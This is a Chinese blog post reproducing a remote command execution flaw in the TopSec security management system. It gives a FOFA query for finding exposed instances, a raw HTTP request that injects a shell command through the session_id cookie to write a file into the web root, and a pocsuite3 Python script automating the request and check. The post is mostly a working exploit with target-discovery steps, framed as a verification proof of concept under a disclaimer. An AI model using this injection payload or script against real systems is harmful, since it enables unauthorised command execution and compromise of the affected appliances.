漏洞复现-天融信TOPSEC安全管理系统远程命令执行漏洞(附漏洞检测脚本)

最新推荐文章于 2024-02-04 16:21:14 发布
最新推荐文章于 2024-02-04 16:21:14 发布
阅读量618 收藏 10
点赞数 10
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjj1029056414/article/details/135375807
版权

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

天融信TopSec 安全管理系统存在存在远程命令执行漏洞,通过此漏洞,攻击者可进行文件写入等危险操作,威胁系统安全。

fofa语句

title="Web User Login" && body="/cgi/maincgi.cgi?Url=VerifyCode"

poc加检测

GET /cgi/maincgi.cgi?Url=check HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cookie: session_id_443=1|echo '12345678' >> /www/htdocs/site/image/security1.txt;

虽然报操作超时,但是执行成功,去/site/image/security1.txt页面查看

poc脚本

脚本使用pocsuite框架

# _*_ coding:utf-8 _*_
# @Time : 2024/1/3


from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str


class trx_topsec_cookie_rce(POCBase):
    pocDesc = '''天融信TOPSEC安全管理系统远程命令执行漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2024-1-3'
    name = '天融信TOPSEC安全管理系统远程命令执行漏洞'

    def _verify(self):

        result = {}
        path = """/cgi/maincgi.cgi?Url=check"""
        path1= "/site/image/security1.txt"
        check_url = self.url + path1
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
            "Cookie": "session_id_443=1|echo '12345678' >> /www/htdocs/site/image/security1.txt;"

        }
        url = self.url + path

        try:
            response = requests.get(url, headers=headers)
            if response.status_code == 200:
                response1 = requests.get(check_url)
                if response1.status_code == 200:
                    result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass


register_poc(trx_topsec_cookie_rce)

脚本利用

炼金术师诸葛亮
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞】天TOPSEC static_convert 远程命令执行
失心少年
01-12 268
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!攻击者通过发送精心构造的恶意请求,利用了该漏洞,成功实在目标系统执行任意系统命令的攻击。成功利用漏洞的攻击者可在目标系统执行恶意操作,可能导致数据泄露、系统瘫痪或远程控制。
TOPSEC Cookie 远程命令执行漏洞
Keepb1ue的博客
01-04 889
TopSec 安全管理系统,是基于大数据架构,采用多种技术手段收集各类探针设备安全数据,围绕资产、漏洞、攻击、威胁等安全要素进行全面分析,提供统一监测告警、集中策略管控、协同处置流程,实客户等保合规、资产统一管理、风险一键阻断等应用价值。
TOPSEC Cookie 远程命令执行漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
01-04 927
TOPSEC解决方案包括综合管理系统,各类安全产品如防火墙、VPN、安全网关、宽带管理、入侵检测、内容过滤、个人安全套件以及综合安全审计系统等多种安全功能。该系统Cookie 处存在RCE漏洞,会导致服务器失陷。
【转载】漏洞--TOPSEC两处远程命令执行
最新发布
maoxiaotao的博客
02-04 80
TOPSEC)是国内领先的网络安全解决方案提供商之一。他们专注于网络安全技术和产品的研发、生产和服务,为政府机构、企业和个人用户提供全面的网络安全解决方案。
全网最全Struts 2 全版本漏洞检测工具,最新struts漏洞更新
04-18
Struts 2 全版本漏洞检测工具
文档安全管理系统.pptx
08-10
文档加密需求分析 企业文档安全防护范围 文档安全管理系统的价值 文档安全管理系统解决方案等
安全隔离与息交换系统-安装使用手册V3(Web界面).doc
08-04
首先,感谢使用天安全隔离与息交换系统! 天安全隔离与息交换系统是由天自主研发的、具有自主知识版权的隔离设备。该系统对网络通进行完整采集、深层解析、应用重建,在网络间采用专用非TCP/IP...
第一节 揭露如何利用网站漏洞“薅羊毛”(天网络安全公开课程)
09-23
教育网络安全公开课系列之揭露如何利用网站漏洞“薅羊毛”?天教育网络安全公开课系列之揭露如何利用网站漏洞“薅羊毛”?
用户手册-主机监控与审计系统_v3.1.docx
12-13
以上资源为安全厂商:天的主机监控与审计系统用户手册,该手册目前为内部交流或提供客户使用的。该文档(用户手册-主机监控与审计系统_v3.1.docx)是目前最新的用户手册。
Windows权限提升—溢出提权
剁椒鱼头没剁椒的博客
03-16 2598
这里需要我们了解的权限提升大概分为:后台权限,网站权限,数据本权限。接口权限,系统权限。域控权限等。此提权方法是利用系统本身存在的一些系统内核溢出漏洞,但未曾打相应的补丁,攻击者通过对比systeminfo息中的补丁息来查找缺失的补丁号,通过缺失补丁号对照相应的系统版本查找对应可以提权提升的exp。不过这里需要注意,只要对应的补丁号加上对应的系统的版本的提权exp才可以成功,有时候如果查找到提权exp提权不成功,那么就可以查看是不是系统版本没对应上,且不排除一些提权漏洞利用需要相应的环境。
权限提升-Win溢出漏洞及AT&SC&PS提权
weixin_44805159的博客
10-13 286
#知识点必备用户及用户组权限划分:Windows提权名Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些权限(permissions),它们具有管理本地计算机或访问本地资源的权限。只要用户账户加入到这些本地组内,这些用户账户也将具备该组所拥有的权限。0x01 普通权限默认情况下,系统为用户分了7个组,并给每个组赋予了不同的操作权限,管理员组(Administrator)、高权限用户组(Power Users)、普通用户组(Users)、备份操作组(Backup Operators)、文件
提权(概述、水平/垂直越权、windows/linux提权、反弹shell、Linux_Exploit_Suggester、searchsploit)
Pluto.的博客
12-24 5125
文章目录提权一、概述1. 什么是提权?2. 水平越权&垂直越权3. 分类- windows1. 系统漏洞提权1.1 基于windows20031.2 基于windows2008- Linux 提权 一、概述 1. 什么是提权? 提权即提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得该服务器权限。 2. 水平越权&垂直越权 水平越权:指相同权限下不同的用户可以互相访问; 垂直越权:指使用权限低的用户可以访问到权限较高的用户; 比如:
内网渗透之权限提升:Windows权限提升漏洞
balalawb的博客
10-14 219
Windows权限提升漏洞
渗透测试中的提权思路(详细!)
jklbnm12的博客
08-10 1059
J01n / 2021-07-29 23:44:22 / 浏览数 1583 安全技术 WEB安全[顶(2)](javascript:) [踩(0)](javascript:) **提权Webshell:**尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞系统漏洞,服务器漏洞,第三方软件漏洞,数据库漏洞)来获取shell。 **反弹shell:**利用kali虚拟机msfVENOM编写反弹shell脚本 被控制端发起的shell—通常用于
内网渗透第4章-权限提升(windwos)
nigo134的博客
05-15 2616
1.内核溢出漏洞提权 利用Metasploit发缺失补丁 2.Windows操作系统配置错误利用分析及防范 系统服务权限配置错误 Windows系统服务文件在操作系统启动时加载和执行,并在后台调用可执行文件。因此,如果一个低权限的用户对此类系统服务调用的可执行文件拥有写权限,就可以将该文件替换成任意可执行文件,并随着系统服务的启动获得系统权限。Windows服务是以System权限运行的,因此,其文件夹、文件和注册表键值都是受强访问控制机制保护的。但是,在某些情况下,操作系统中仍然存在一些没有
网络空间安全——利用 CVE-2017-0213 提权
Jay
12-22 556
VE-2017-0213 是一个比较冷门的COM 类型混淆 (Type Confusion)漏洞。巧妙的利用该漏洞,可以实本地的。以窗口(cmd)形式打开并执行命令查看一下在权限whoami发是system权限说明利用成功了。该漏洞由著名的Google Project zero 发。利用 CVE-2017-0213 简单提权。利用 CVE-2017-0213 简单提权。-2017-0213漏洞简单提权,首先下载CVE-2017-0213。接下来创建一个用户试试吧!下面就简单演示一下利用。
网安学习-Linux提权
weixin_44770698的博客
07-23 1261
网安学习-Linux提权
关于内网渗透的提权问题
weixin_48421613的博客
06-02 816
最近有小老弟问我,总有面试官问关于提权的问题,总是能把我难住。好吧,面试造航母干活 拧螺丝这句话在哪里都很实用,索性今天也就写一下我认为的提权。 首先呢,其实权限提升这种事情多用于内网渗透,这里指的内网渗透当然不是你处于内网环境的渗透测试,而是那种在攻防演练、护网、打击境外的一些特殊场景,由外网入侵到内网做后渗透的时候遇到的权限提升问题。(大佬勿喷,我实在想不到还有哪里做提权,正常安全评估是完全用不到这一项技能的,毕竟传统工艺点到为止) 什么是提权 主要针对在对网站的渗透过程中,通过利用网站或服务器系.
struts2全版本漏洞检测工具 天
08-04
是一家安全解决方案提供商,其开发了一款名为"struts2全版本漏洞检测工具"的产品。 该工具主要用于检测struts2框架在不同版本中存在的漏洞,并帮助用户及时发和修这些漏洞,保护应用程序免受潜在攻击的威胁。 该工具的主要特点包括: 1. 兼容性:能够检测struts2框架的各个版本,无论是旧版还是最新版,都能够进行全面的漏洞检测。 2. 自动化:能够通过自动化的方式扫描应用程序中的struts2漏洞,无需人工逐个分析代码,大大节省时间和精力。 3. 漏洞检测:能够准确识别不同版本struts2框架中已知的漏洞,并生成详细的漏洞报告,包括漏洞描述、危害程度以及修建议等息。 4. 安全性:能够保证敏感息的安全性,包括扫描过程中的数据传输加密、数据存储加密等措施,确保不会对被扫描的系统造成任何风险。 5. 漏洞:根据漏洞检测结果提供的修建议,用户可及时对系统进行修,避免被黑客攻击利用漏洞进行非法操作。 总之,天的"struts2全版本漏洞检测工具"是一款功能强大、易于使用的安全工具,可帮助用户全面检测和修struts2框架中的漏洞,提升应用程序的安全性和稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值